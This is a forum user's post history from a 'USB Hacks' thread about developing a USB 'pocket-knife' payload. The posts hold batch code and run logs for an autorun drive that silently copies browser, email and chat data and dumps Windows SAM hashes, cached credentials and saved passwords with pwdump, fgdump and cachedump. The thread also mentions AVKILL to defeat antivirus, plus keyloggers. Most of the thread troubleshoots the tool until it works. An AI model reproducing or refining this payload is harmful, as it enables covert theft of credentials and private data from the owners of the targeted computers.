%logdir%\Slurp_Data\IExplorer\ xcopy "C:\Documents and Settings\%username%\Application Data\Microsoft\Address Book\*.wab" "%logdir%\Slurp_Data\IExplorer\" /s /c /q /r /h /y fc.exe "C:\Documents and Settings\%username%\Favorites\*" "%logdir%\Slurp_Data\IExplorer\*" /i /o :: Outlook & Outlook Express Data mkdir %logdir%%\Slurp_Data\Outlook\ xcopy "C:\Documents and Settings\%username%\local Settings\Application Data\Microsoft\Outlook\*" "%logdir%\Slurp_Data\Outlook\" /s /c /q /r /h /y xcopy "C:\Documents and Settings\%username%\local Settings\Application Data\Identities\*" %logdir%\Slurp_Data\Outlook /s/c/q/r/h/y :: NetScape Data mkdir %logdir%\Slurp_Data\NetScape\ xcopy "C:\Documents and Settings\%username%\Application Data\Netscape\NSB\Profiles\*.db" "%logdir%\Slurp_Data\NetScape\" /s /c /q /r /h /y xcopy "C:\Documents and Settings\%username%\Application Data\Netscape\NSB\Profiles\*.dat" "%logdir%\Slurp_Data\NetScape\" /s /c /q /r /h /y xcopy "C:\Documents and Settings\%username%\Application Data\Netscape\NSB\Profiles\*bookmarks.html" "%logdir%\Slurp_Data\NetScape\" /s /c /q /r /h /y :: Opera Data mkdir %logdir%\Slurp_Data\Opera\ xcopy "C:\Documents and Settings\%username%\Application Data\Opera\Opera\profile\*.dat" "%logdir%\Slurp_Data\Opera\" /s /c /q /r /h /y xcopy "C:\Documents and Settings\%username%\Application Data\Opera\Opera\mail\*.dat" "%logdir%\Slurp_Data\Opera\" /s /c /q /r /h /y xcopy "C:\Documents and Settings\%username%\Application Data\Opera\Opera\mail\*.ini" "%logdir%\Slurp_Data\Opera\" /s /c /q /r /h /y :: Trilian Data mkdir %logdir%\Slurp_Data\Trilian\ xcopy "%progfiles%\Trillian\users\default\logs\*.log" "%logdir%\Slurp_Data\Trilian\" /s /c /q /r /h /y fc.exe "%progfiles%\Trillian\users\default\downloads\*" "%logdir%\Slurp_Data\Trilian\*" /i /o xcopy "%progfiles%\Trillian\users\default\*.ini" "%logdir%\Slurp_Data\Trilian\" /s /c /q /r /h /y :: Yahoo Messenger Data mkdir %logdir%\Slurp_Data\Yahoo.M\ xcopy "%progfiles%\Yahoo!\Messenger\Profiles\*" "%logdir%\Slurp_Data\Yahoo.M\" /s /c /q /r /h /y :: Miranda IM Data mkdir %logdir%\Slurp_Data\Miranda\ xcopy "%progfiles%\Miranda IM\*.dat" "%logdir%\Slurp_Data\Miranda\" /s /c /q /r /h /y xcopy "%progfiles%\Miranda IM\*.bmp" "%logdir%\Slurp_Data\Miranda\" /s /c /q /r /h /y :: Gaim Data mkdir %logdir%\Slurp_Data\Gaim\ xcopy "C:\Documents and Settings\%username%\Application Data\.gaim\*.txt" "%logdir%\Slurp_Data\Gaim\" /s /c /q /r /h /y xcopy "C:\Documents and Settings\%username%\Application Data\.gaim\*.xml" "%logdir%\Slurp_Data\Gaim\" /s /c /q /r /h /y :: ICQ Lite mkdir %logdir%\Slurp_Data\ICQ\ fc.exe "C:\Documents and Settings\%username%\My Documents\ICQ Lite\*" "%logdir%\Slurp_Data\ICQ\*" /i /o IF EXIST %config%\Slurp2.cfg GOTO StartSlurp2 REN %logdir%\Slurp_Data %computername%-SlurpData :SkipSlurp1 btw, because I don't have all these programs installed on all three operating systems, could y'all check what you have against the paths in the slurp code above and let us know if we need to change anything??? Thanks!!!

USB Pocket-Knife Development

Tmbomber replied to Leapo's topic in USB Hacks

I'm presently going through the slurp stuff. Installable stuff is next on the hit parade.

USB Pocket-Knife Development

Tmbomber replied to Leapo's topic in USB Hacks

Concerning things working and not working.... +----------------------------------+ + [External IP] + +----------------------------------+ worked on win2k & xp x64 didn't on xp +----------------------------------+ + [Dump Wifi Hex] + +----------------------------------+ No surprise here. I'm not running any of my machines on a wifi network. +----------------------------------+ + [Dump Network PW] + +----------------------------------+ Not sure what this is suppose to report. It's not working on any of my machines. +----------------------------------+ + [Dump Mail PW] + +----------------------------------+ Worked on win2k, didn't on xp or xp x64 +----------------------------------+ + [Dump IE PW] + +----------------------------------+ Worked on win2k & xp, didn't on xp x64 +----------------------------------+ + [Dump Messenger PW] + +----------------------------------+ Worked on ICQ installed on win2k, didn't catch YIM on xp x64 (don't have any other message services installed) +----------------------------------+ + [Dump Updates-List] + +----------------------------------+ works on win2k & xp, didn't work on xp x64 +----------------------------------+ + [Network Services] + +----------------------------------+ worked on xp & xp x64, b option not present on win2k, so you get a usage dump. works on win2k if you delete the b option. and finally... +----------------------------------+ + [Dump Cache] + +----------------------------------+ Isn't working on any of the three. I get errors on win2k & xp x64, and xp seems to work, but doesn't report anything interesting...

USB Pocket-Knife Development

Tmbomber replied to Leapo's topic in USB Hacks

DOH!!!!! Typing "Echo %os%" at a dos prompt on win2k, XP, and XP x64 all return "Windows_NT". So much for my solution for pwdump fix. Anybody know a better way to detect which OS you're running??? The good news is the fgdump solution I posted works on all there. Therefore, I'm disabling pwdump and running with fgdump. and 403f0rb1dd3n, your additions look good :)

USB Pocket-Knife Development

Tmbomber replied to Leapo's topic in USB Hacks

Ok... Here we go... Took out the extra /'s after the :'s in here: :: Finds the location of the flash partition and sets master variable. IF EXIST z:\CONFIG\Drive_Location.cfg SET flshdrv=z: IF EXIST %flshdrv%\CONFIG\Drive_Location.cfg GOTO FlshDrvFound IF EXIST y:\CONFIG\Drive_Location.cfg SET flshdrv=y: IF EXIST %flshdrv%\CONFIG\Drive_Location.cfg GOTO FlshDrvFound IF EXIST x:\CONFIG\Drive_Location.cfg SET flshdrv=x: (just showing a few, I took all of them out down to b: Changed set variables to look like: :: Sets Variables and paths to clean up pathnams later on IF NOT EXIST %flshdrv%\LOGS\%computername% MD %flshdrv%\LOGS\%computername% SET logdir="%flshdrv%\LOGS\%computername%" SET log="%flshdrv%\LOGS\%computername%\%computername%-[%Year%%Month%%Day%-%Hour%%Minute%%Second%].log" SET tmplog="%flshdrv%\LOGS\%computername%\%computername%_TEMP.log" IF NOT EXIST "%flshdrv%\CONFIG\U3_Drive.cfg" (SET progdir="%flshdrv%\SYSTEM\") ELSE (SET progdir=".\") SET config="%flshdrv%\CONFIG\" IF NOT EXIST "%flshdrv%\CONFIG\U3_Drive.cfg" (SET installdir="%flshdrv%\SYSTEM\INSTALL\") ELSE (SET installdir=".\INSTALL\") SET /p eipurl=<"%flshdrv%\CONFIG\External_IP.cfg" SET U3="%cd%" Changed pwdump and fgdump to look like: IF NOT EXIST %config%\Dump_SAM_PWDUMP.cfg GOTO SkipPWDUMP ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [Dump SAM PWDUMP] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 IF %os% == Windows_NT GOTO PWD1 .\pwdump 127.0.0.1 >> %log% 2>&1 GOTO SkipPWDUMP :PWD1 .\pwdump -x 127.0.0.1 >> %log% 2>&1 :SkipPWDUMP IF NOT EXIST %config%\Dump_SAM_FGDUMP.cfg GOTO SkipFGDUMP ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [Dump SAM FGDUMP] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 CD /D %logdir% >> %log% 2>&1 %U3%\fgdump.exe -vv -c >> %log% 2>&1 CD /D %U3% >> %log% 2>&1 ECHO. >> %log% 2>&1 ECHO -----Hashes----- >> %log% 2>&1 ECHO. >> %log% 2>&1 COPY %log%+%logdir%\127.0.0.1.pwdump %log% >> NUL DEL /f /q %logdir%\*.log >> %log% 2>&1 DEL /f /q %logdir%\*.fgdump-log >> %log% 2>&1 DEL /f /q %logdir%\127.0.0.1* >> %log% 2>&1 :SkipFGDUMP That's about it for now. AVKILL is still detected by avast. I disable avast and the payload runs silently on my x64 machine. There are still a few things that don't report output. I'm going to look into those next: ----------------------------------------------------------------------------------------------------------------------------- +----------------------------------+ + [Dump Wifi Hex] + +----------------------------------+ ----------------------------------------------------------------------------------------------------------------------------- +----------------------------------+ + [Dump Network PW] + +----------------------------------+ ----------------------------------------------------------------------------------------------------------------------------- +----------------------------------+ + [Dump Mail PW] + +----------------------------------+ ----------------------------------------------------------------------------------------------------------------------------- +----------------------------------+ + [Dump IE PW] + +----------------------------------+ ----------------------------------------------------------------------------------------------------------------------------- +----------------------------------+ + [Dump Messenger PW] + +----------------------------------+ ----------------------------------------------------------------------------------------------------------------------------- +----------------------------------+ + [Dump Updates-List] + +----------------------------------+ ----------------------------------------------------------------------------------------------------------------------------- I'll check what doesn't work on xp and win2k first. Probably won't be able to report on it until tomorrow.

USB Pocket-Knife Development

Tmbomber replied to Leapo's topic in USB Hacks

ok.... IF EXIST b:\CONFIG\Drive_Location.cfg SET flshdrv=b:\ IF EXIST %flshdrv%\CONFIG\Drive_Location.cfg GOTO FlshDrvFound makes %flshdrv% = b:\ :: Sets Variables and paths to clean up pathnams later on IF NOT EXIST %flshdrv%\LOGS\%computername% MD %flshdrv%\LOGS\%computername% SET logdir="%flshdrv%\LOGS\%computername% SET log="%flshdrv%\LOGS\%computername%\%computername%-[%Year%%Month%%Day%-%Hour%%Minute%%Second%].log" SET tmplog="%flshdrv%\LOGS\%computername%\%computername%_TEMP.log" IF NOT EXIST "%flshdrv%\CONFIG\U3_Drive.cfg" (SET progdir="%flshdrv%\SYSTEM\") ELSE (SET progdir=".\") SET config="%flshdrv%\CONFIG\" IF NOT EXIST "%flshdrv%\CONFIG\U3_Drive.cfg" (SET installdir="%flshdrv%\SYSTEM\INSTALL\") ELSE (SET installdir=".\INSTALL\") SET /p eipurl=<"%flshdrv%\CONFIG\External_IP.cfg" SET U3="%cd%\SYSTEM" every occurrence of %flshdrv% in that has a \ after it. We need to delete the \ from either the drive detect section or the Set Variables part. I'd say change it in the drive detect part. That should fix the \\ faults. %logdir% is pointing to the cd partition, which is all wrong. fixing the \\ may fix that as well. Going to check. < edit > Just noticed missing " on the end of the set logdir line. Don't know if that's a problem yet

USB Pocket-Knife Development

Tmbomber replied to Leapo's topic in USB Hacks

Tried changing directories again... ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [Dump SAM FGDUMP] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 CD >> %log% 2>&1 ECHO %u3% >> %log% 2>&1 ECHO %logdir% >> %log% 2>&1 ECHO %log% >> %log% 2>&1 CD /D %logdir% >> %log% 2>&1 CD >> %log% 2>&1 %U3%\fgdump.exe -vv -c >> %log% 2>&1 CD >> %log% 2>&1 CD /D %U3% >> %log% 2>&1 CD >> %log% 2>&1 Yielded this: +----------------------------------+ + [Dump SAM FGDUMP] + +----------------------------------+ M:\SYSTEM "M:\SYSTEM\SYSTEM" "n:\\LOGS\MYPC\MYPC-[20080921-135445].log" M:\SYSTEM The system cannot find the path specified. M:\SYSTEM The system cannot find the path specified. M:\SYSTEM %u3% is reported out as M"system, which is correct. %logdir% is reported as M:\system\system??? %log% has a double \??? small wonder I'm having trouble... back to editing.

USB Pocket-Knife Development

Tmbomber replied to Leapo's topic in USB Hacks

Hey.... This worked on my x64 box.... IF NOT EXIST %config%\Dump_SAM_PWDUMP.cfg GOTO SkipPWDUMP ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [Dump SAM PWDUMP] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 IF %os% == Windows_NT GOTO PWD1 .\pwdump 127.0.0.1 >> %log% 2>&1 GOTO SkipPWDUMP :PWD1 .\pwdump -x 127.0.0.1 >> %log% 2>&1 :SkipPWDUMP Still having trouble with fgdump changing directories though. And AVKILL is detected by avast. For the record, I've been concentrating on the switchblade stuff. I haven't even looked at the installable stuff yet. (hacksaw, keylogger, et. al.) I just leave them disabled for now. Once we get all this hammered out I'll dig into those. < edit > the os check didn't help on my XP or my win2K boxes... checking some more...

USB Pocket-Knife Development

Tmbomber replied to Leapo's topic in USB Hacks

http://technet.microsoft.com/en-us/library/bb490982.aspx Ok, now I see why that one line only had a single > rather than two of them... My bad.

USB Pocket-Knife Development

Tmbomber replied to Leapo's topic in USB Hacks

Found this: http://technet.microsoft.com/en-us/library/bb490954.aspx the %os% variable is looking interesting... XP x64 returns Windows_NT

USB Pocket-Knife Development

Tmbomber replied to Leapo's topic in USB Hacks

Tried changing directories... ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [Dump SAM FGDUMP] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 CD >> %log% 2>&1 CD /D %logdir% >> %log% 2>&1 CD >> %log% 2>&1 %\fgdump.exe -vv -c >> %log% 2>&1 CD >> %log% 2>&1 CD /D % >> %log% 2>&1 CD >> %log% 2>&1 ECHO. >> %log% 2>&1 ECHO -----Hashes----- >> %log% 2>&1 ECHO. >> %log% 2>&1 COPY %log%+%logdir%\127.0.0.1.pwdump %log% >> NUL DEL /f /q %logdir%\127.0.0.1* >> %log% 2>&1 DEL /f /q %logdir%\*.log >> %log% 2>&1 DEL /f /q %logdir%\*.fgdump-log >> %log% 2>&1 Yielded this: +----------------------------------+ + [Dump SAM FGDUMP] + +----------------------------------+ M:\SYSTEM M:\SYSTEM The system cannot find the path specified. M:\SYSTEM The system cannot find the path specified. M:\SYSTEM -----Hashes----- The " CD >> %log% 2>&1" lines are in there to tell the log file what directory I'm in. They resulted in M:\system every time. So my "CD /D %logdir% >> %log% 2>&1" didn't actually do anything. < sigh > It's late and I'm tired... More tomorrow.

USB Pocket-Knife Development

Tmbomber replied to Leapo's topic in USB Hacks

Ok, running this: ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [Dump SAM FGDUMP] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 .\fgdump.exe -vv -c >> %log% 2>&1 ECHO. >> %log% 2>&1 ECHO -----Hashes----- >> %log% 2>&1 ECHO. >> %log% 2>&1 COPY %log%+%progdir%\127.0.0.1.pwdump %log% >> NUL DEL /f /q %progdir%\127.0.0.1* >> %log% 2>&1 DEL /f /q %progdir%\*.log >> %log% 2>&1 DEL /f /q %progdir%\*.fgdump-log >> %log% 2>&1 Yielded this: +----------------------------------+ + [Dump SAM FGDUMP] + +----------------------------------+ fgDump 2.1.0 - fizzgig and the mighty group at foofus.net Written to make j0m0kun's life just a bit easier Copyright© 2008 fizzgig and foofus.net fgdump comes with ABSOLUTELY NO WARRANTY! This is free software, and you are welcome to redistribute it under certain conditions; see the COPYING and README files for more information. Error opening output log file 2008-09-20-02-30-20.fgdump-log, disabling further log writing. Error code returned was 5 --- Session ID: 2008-09-20-02-30-20 --- Error opening output log file 2008-09-20-02-30-20.fgdump-log, disabling further log writing. Error code returned was 5 >> A new worker thread has been created with the ID: 00000e78 << Starting dump on 127.0.0.1 Error opening failed output log file 2008-09-20-02-30-20.failed, disabling further log writing. Error code returned was 5 ** Beginning local dump ** INFO: skipping cachedump on 127.0.0.1 because 127.0.0.1.cachedump exists or I was told to skip cache dumps INFO: skipping dump of protected storage secrets on 127.0.0.1 because 127.0.0.1.lsadump exists or I was told to skip LSA dumps Skipping impersonation (no user provided) OS (127.0.0.1): Microsoft Windows 2003 Professional Service Pack 2 (Build 3790) (64-bit) Failed to dump passwords: This application has requested the Runtime to terminate it in an unusual way. Please contact the application's support team for more information. Terminating thread 00000e78 (lpszServer is NULL) -----Summary----- Failed servers: NONE Successful servers: 127.0.0.1 Total failed: 0 Total successful: 1 -----Hashes----- Could Not Find M:\SYSTEM\127.0.0.1* Could Not Find M:\SYSTEM\*.log Could Not Find M:\SYSTEM\*.fgdump-log It appears that it's attempting to create the log files on the cd partition. Going to try specifying an output file.

USB Pocket-Knife Development

Tmbomber replied to Leapo's topic in USB Hacks

Newer versions of cachedump can be found here: http://no-spam-here.com/cachedump/ v1.3 still failed on my x64 machine :(

USB Pocket-Knife Development

Tmbomber replied to Leapo's topic in USB Hacks

fgdump [-?][-t][-c][-w][-s][-r][-v][-k][-o][-a][-l logfile][-T threads] [{{-h Host | -f filename} -u Username -p Password | -H filename}] where Username and Password have administrator credentials -? displays help (you're looking at it!) -t will test for the presence of antivirus without actually running the password dumps -c skips the cache dump -w skips the password dump -s performs the protected storage dump -r forgets about existing pwdump/cachedump files. The default behavior is to skip a host if these files already exist. -v makes output more verbose. Use twice for greater effect -k keeps the pwdump/cachedump going even if antivirus is in an unknown state -l logs all output to logfile -T runs fgdump with the specified number of parallel threads -h is the name of the single host to perform the dumps against -f reads hosts from a line-separated file -H reads host:username:password from a line-separated file (per-host cr edentials) -o skips pwdump history dumps -a will not attempt to detect or stop antivirus, even if it is present There's fgdump's usage information. The payload has the most resent version. If you type fgdump -? you get a slightly different usage line: fgdump [-?][-t][-c][-w][-s][-r][-v][-k][-o][-a][-O 32|64][-l logfile][-T threads] [{{-h Host | -f filename} -u Username -p Password | -H filename}] The "[-O 32|64]" being the important part... From http://swamp.foofus.net/fizzgig/fgdump/default.htm: # Better 32/64 bit detection. This is not as easy as it sounds, at least not remotely! If someone has a sure-fire way for 100% reliably detecting the target OS, please let me know. In the mean time, if fgdump is unsure, it will report it and default to 32-bit. # The -O [32|64] flag will manually override the target OS architecture. So, for example if fgdump is reporting a host as 32-bit and you KNOW it is 64-bit, you can use -O 64 (or vice-versa, of course). Note that this flag will apply to ALL hosts you are dumping! You might want to single out any hosts you need to override. So it tries to autodetect, and if it fails it assumes x32. (bad on my x64 machine) We also have the current version of pwdump. The docs say we have to set -x set for x64 machines: You MUST use -x if your target is a 64-bit OS. It DOES NOT MATTER what type of OS you are running FROM, only what your TARGET is! pwdump.exe itself is a 32-bit executable, and runs the same from any OS. The service and DLL are different depending on 32/64-bit. I tried manually executing "pwdump -x 127.0.0.1" in a command prompt window and it worked fine. On the Win2K machine, cache dump yielded: +----------------------------------+ + [Dump Cache] + +----------------------------------+ Service not found. Installing CacheDump Service (E:\SYSTEM\CACHEDUMP.EXE -s) CacheDump service successfully installed. Service started. Service currently active. Stopping service... Service successfully removed. and nothing more. (apparently nothing cached there) On my normal XP machine I got: +----------------------------------+ + [Dump Cache] + +----------------------------------+ Service not found. Installing CacheDump Service (G:\SYSTEM\CACHEDUMP.EXE -s) CacheDump service successfully installed. Service started. Service successfully removed. So again, nothing cached. On my x64 machine I got: +----------------------------------+ + [Dump Cache] + +----------------------------------+ Service not found. Installing CacheDump Service (M:\SYSTEM\CACHEDUMP.EXE -s) CacheDump service successfully installed. Service started. ERROR Failed to open key SECURITY\Cache in RegOpenKeyEx. Is service running as SYSTEM ? Do you ever log on domain ? (code 0) Service currently active. Stopping service... ControlService failed to STOP the service.Retry in 2 sec Service successfully removed. - Hmmm... didn't like that. Manually executing in a dos window it says it's version 1.0 and only lists -v, -vv, & -K as options. Going off to do some research...

USB Pocket-Knife Development

Tmbomber replied to Leapo's topic in USB Hacks

Concerning network services.... I ran the payload on a Win 2K box and got: +----------------------------------+ + [Network Services] + +----------------------------------+ Displays protocol statistics and current TCP/IP network connections. NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval] -a Displays all connections and listening ports. -e Displays Ethernet statistics. This may be combined with the -s option. -n Displays addresses and port numbers in numerical form. -p proto Shows connections for the protocol specified by proto; proto may be TCP or UDP. If used with the -s option to display per-protocol statistics, proto may be TCP, UDP, or IP. -r Displays the routing table. -s Displays per-protocol statistics. By default, statistics are shown for TCP, UDP and IP; the -p option may be used to specify a subset of the default. interval Redisplays selected statistics, pausing interval seconds between each display. Press CTRL+C to stop redisplaying statistics. If omitted, netstat will print the current configuration information once. Notice it doesn't list a b option. I think the OS version detection would be a great idea. PWdump and FGdump are the ones that seem to have the most trouble with x64. (it crashed when running on Win2K, too) I'm going to dig into their docs next.

USB Pocket-Knife Development

Tmbomber replied to Leapo's topic in USB Hacks

Ummmm..... Minor one that's been bothering me.... :: Header information ECHO ----------------------------------------------------------------------------------------------------------------------------- > %log% 2>&1 ECHO Leapos Payload [Time Started: %date% %time%] >> %log% 2>&1 ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 Shouldn't that first long line have two ">" before the %log%??? Yeah, I know... It's just that I fix it every time :) < edit > Ignore this, it's suppose to only have one >

USB Pocket-Knife Development

Tmbomber replied to Leapo's topic in USB Hacks

This just in, On my laptop running non-x64 XP I get an exception fault when FGdump runs and I get nine "No Disk" errors when Network services runs... When I get home I'll try network services without the "b" option (had problems with that before)

USB Pocket-Knife Development

Tmbomber replied to Leapo's topic in USB Hacks

Are you allowing the payload to execute automatically when you insert the thumbdrive, selecting "run payload" from menu.bat, or running start.bat directly from a dos prompt? When I'm testing I do the first. I found the second had problems. And the third won't work because start.bat is expecting parameters to be passed to it from go.vbs.

USB Pocket-Knife Development

Tmbomber replied to Leapo's topic in USB Hacks

Are you running the U3 version, or the non-U3 version? Could you post a bit of the generated log file? Say a half dozen lines before and after the error occurs.

USB Pocket-Knife Development

Tmbomber replied to Leapo's topic in USB Hacks

Just noticed this... With everything turned on except pwdump and the installers I only get one window popping up that says: "Windows cannot find '.\csrss.exe'. Make sure you typed the name correctly (yada yada yada)" and it want's me to click ok. csrss.bat is there, it appears that csrss.exe is not. Might wanna check on that one.

USB Pocket-Knife Development

Tmbomber replied to Leapo's topic in USB Hacks

Ok, found a couple good ones.... First off... At the top of start.bat you have CD /SYSTEM Then a little farther down you have: :: Sets Variables and paths to clean up pathnams later on IF NOT EXIST %flshdrv%\LOGS\%computername% MD %flshdrv%\LOGS\%computername% SET logdir="%flshdrv%\LOGS\%computername% SET log="%flshdrv%\LOGS\%computername%\%computername%-[%Year%%Month%%Day%-%Hour%%Minute%%Second%].log" SET tmplog="%flshdrv%\LOGS\%computername%\%computername%_TEMP.log" IF NOT EXIST "%flshdrv%\CONFIG\U3_Drive.cfg" (SET progdir="%flshdrv%\SYSTEM\") ELSE (SET progdir=".\SYSTEM\") SET config="%flshdrv%\CONFIG\" IF NOT EXIST "%flshdrv%\CONFIG\U3_Drive.cfg" (SET scriptdir="%flshdrv%\SYSTEM\PROGS\SCRIPT\") ELSE (SET scriptdir=".\SYSTEM\PROGS\SCRIPT\") IF NOT EXIST "%flshdrv%\CONFIG\U3_Drive.cfg" (SET installdir="%flshdrv%\SYSTEM\INSTALL\") ELSE (SET installdir=".\SYSTEM\INSTALL\") SET /p eipurl=<"%flshdrv%\CONFIG\External_IP.cfg" SET U3="%cd% First, scriptdir isn't used any more, so delete that line. Second, seeing we're already CDed to \SYSTEM, the lines setting progdir and installdir shouldn't have \system in them in the "else" part of the line. They should read as: IF NOT EXIST "%flshdrv%\CONFIG\U3_Drive.cfg" (SET progdir="%flshdrv%\SYSTEM\") ELSE (SET progdir=".\") SET config="%flshdrv%\CONFIG\" IF NOT EXIST "%flshdrv%\CONFIG\U3_Drive.cfg" (SET installdir="%flshdrv%\SYSTEM\INSTALL\") ELSE (SET installdir=".\INSTALL\") This change made all kinds of things start working. Also, IF NOT EXIST %config%\Port_Scan.cfg GOTO SkipPortScan ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [Port Scan] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 .\portqry -local -l %tmplog% >> %log% 2>&1 COPY %log%+%tmplog%* %log% >> NUL DEL /f /q %tmplog% >NUL :SkipPortScan ECHO. >> %log% 2>&1 ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO Leapos Payload [Time Finished: %date% %time%] >> %log% 2>&1 ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 Port Scan hangs for me every time. I checked the docs on portqry and found that we don't need to use the templog copy. I changed it to read as: IF NOT EXIST %config%\Port_Scan.cfg GOTO SkipPortScan ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [Port Scan] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 .\portqry -local -v -v >> %log% 2>&1 :SkipPortScan DEL /f /q %tmplog% >NUL ECHO. >> %log% 2>&1 ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 ECHO Leapos Payload [Time Finished: %date% %time%] >> %log% 2>&1 ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1 added "-v -v" for maximum verbosity and moved the DEL tmplog to the bottom to clean that file out (it still was remaining from time to time) I notice several items hard code .\ instead of using progdir. It doesn't matter for my U3 drives, but that might give you a bit or trouble on your non-U3 ones. (no clue on that as I'm not using non-U3) I still have a couple individual items not running, but this is on my x64 machine. I'll try them on my non-x64 machines and report back tomorrow. Later y'all :)

USB Pocket-Knife Development

Tmbomber replied to Leapo's topic in USB Hacks

Ok, v0860... Heeeeere we go..... I found out that PWDump requires a command line option to be set if you're running on an x64 operating system. (something like -O64) I've disabled on my switchblades seeing I work with a mix of x64 and non x64 machines. +----------------------------------+ + [Dump URL History] + +----------------------------------+ Input Error: Can not find script file "M:\SYSTEM\SYSTEM\DUH.vbs". Hmmm... ECHO +----------------------------------+ >> %log% 2>&1 ECHO + [Dump URL History] + >> %log% 2>&1 ECHO +----------------------------------+ >> %log% 2>&1 CSCRIPT //nologo %progdir%\DUH.vbs >> %log% 2>&1 That should work ok... IF NOT EXIST "%flshdrv%\CONFIG\U3_Drive.cfg" (SET progdir="%flshdrv%\SYSTEM\") ELSE (SET progdir=".\SYSTEM\") come to think of it, I have a bunch of things not working... +----------------------------------+ + [External IP] + +----------------------------------+ ----------------------------------------------------------------------------------------------------------------------------- +----------------------------------+ + [Dump Wifi Hex] + +----------------------------------+ ----------------------------------------------------------------------------------------------------------------------------- +----------------------------------+ + [Dump SAM FGDUMP] + +----------------------------------+ Access is denied. -----Hashes----- ----------------------------------------------------------------------------------------------------------------------------- +----------------------------------+ + [Dump Network PW] + +----------------------------------+ ----------------------------------------------------------------------------------------------------------------------------- +----------------------------------+ + [Dump Mail PW] + +----------------------------------+ ----------------------------------------------------------------------------------------------------------------------------- +----------------------------------+ + [Dump Firefox PW] + +----------------------------------+ The system cannot find the path specified. ----------------------------------------------------------------------------------------------------------------------------- +----------------------------------+ + [Dump IE PW] + +----------------------------------+ ----------------------------------------------------------------------------------------------------------------------------- +----------------------------------+ + [Dump Messenger PW] + +----------------------------------+ ----------------------------------------------------------------------------------------------------------------------------- +----------------------------------+ + [Dump Cache] + +----------------------------------+ The system cannot find the path specified. ----------------------------------------------------------------------------------------------------------------------------- and port scan isn't functioning, either. going to work on it some.

USB Pocket-Knife Development

Tmbomber replied to Leapo's topic in USB Hacks

That may be it right there. I'm playing with the U3 version exclusively. I just downloaded your most resent update. I'll be trying it shortly.

Sign In

Tmbomber

Posts

Joined

Last visited

Content Type

Profiles

Forums

Everything posted by Tmbomber

USB Pocket-Knife Development

USB Pocket-Knife Development

USB Pocket-Knife Development

USB Pocket-Knife Development

USB Pocket-Knife Development

USB Pocket-Knife Development

USB Pocket-Knife Development

USB Pocket-Knife Development

USB Pocket-Knife Development

USB Pocket-Knife Development

USB Pocket-Knife Development

USB Pocket-Knife Development

USB Pocket-Knife Development

USB Pocket-Knife Development

USB Pocket-Knife Development

USB Pocket-Knife Development

USB Pocket-Knife Development

USB Pocket-Knife Development

USB Pocket-Knife Development

USB Pocket-Knife Development

USB Pocket-Knife Development

USB Pocket-Knife Development

USB Pocket-Knife Development

USB Pocket-Knife Development

USB Pocket-Knife Development

Browse

Activity